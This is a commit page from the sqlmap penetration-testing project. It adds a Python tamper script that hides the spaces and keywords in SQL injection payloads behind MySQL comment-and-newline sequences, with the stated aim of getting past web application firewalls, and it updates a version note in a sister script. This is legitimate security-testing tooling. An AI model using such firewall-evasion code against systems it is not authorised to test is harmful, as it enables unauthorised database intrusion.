Skip to content

Commit 062c156

Browse files
bdamelebdamele
committed
Added another tamper script from Roberto Salgado
1 parent 93219b9 commit 062c156

2 files changed

Lines changed: 67 additions & 1 deletion

File tree

tamper/space2morepound.py

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
#!/usr/bin/env python
2+
3+
"""
4+
$Id$
5+
6+
Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
7+
See the file 'doc/COPYING' for copying permission
8+
"""
9+
10+
import os
11+
import re
12+
import random
13+
import string
14+
15+
from lib.core.common import singleTimeWarnMessage
16+
from lib.core.data import kb
17+
from lib.core.enums import DBMS
18+
from lib.core.enums import PRIORITY
19+
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
20+
21+
__priority__ = PRIORITY.LOW
22+
23+
def dependencies():
24+
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
25+
26+
def tamper(payload):
27+
"""
28+
Replaces space character (' ') with a pound character ('#') followed by
29+
a random string and a new line ('\n')
30+
31+
Example:
32+
* Input: 1 AND 9227=9227
33+
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
34+
35+
Requirement:
36+
* MySQL >= 5.1.13
37+
38+
Tested against:
39+
* MySQL 5.1.41
40+
41+
Notes:
42+
* Useful to bypass several web application firewalls
43+
"""
44+
45+
def process(match):
46+
word = match.group('word')
47+
randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
48+
49+
if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
50+
return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
51+
else:
52+
return match.group()
53+
54+
retVal = ""
55+
56+
if payload:
57+
payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload)
58+
59+
for i in xrange(len(payload)):
60+
if payload[i].isspace():
61+
randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
62+
retVal += "%%23%s%%0A" % randomStr
63+
else:
64+
retVal += payload[i]
65+
66+
return retVal

tamper/space2pound.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,7 @@ def tamper(payload):
3333
* MySQL
3434
3535
Tested against:
36-
* MySQL 5.0
36+
* MySQL 4.0, 5.0
3737
3838
Notes:
3939
* Useful to bypass several web application firewalls

0 commit comments

Comments
 (0)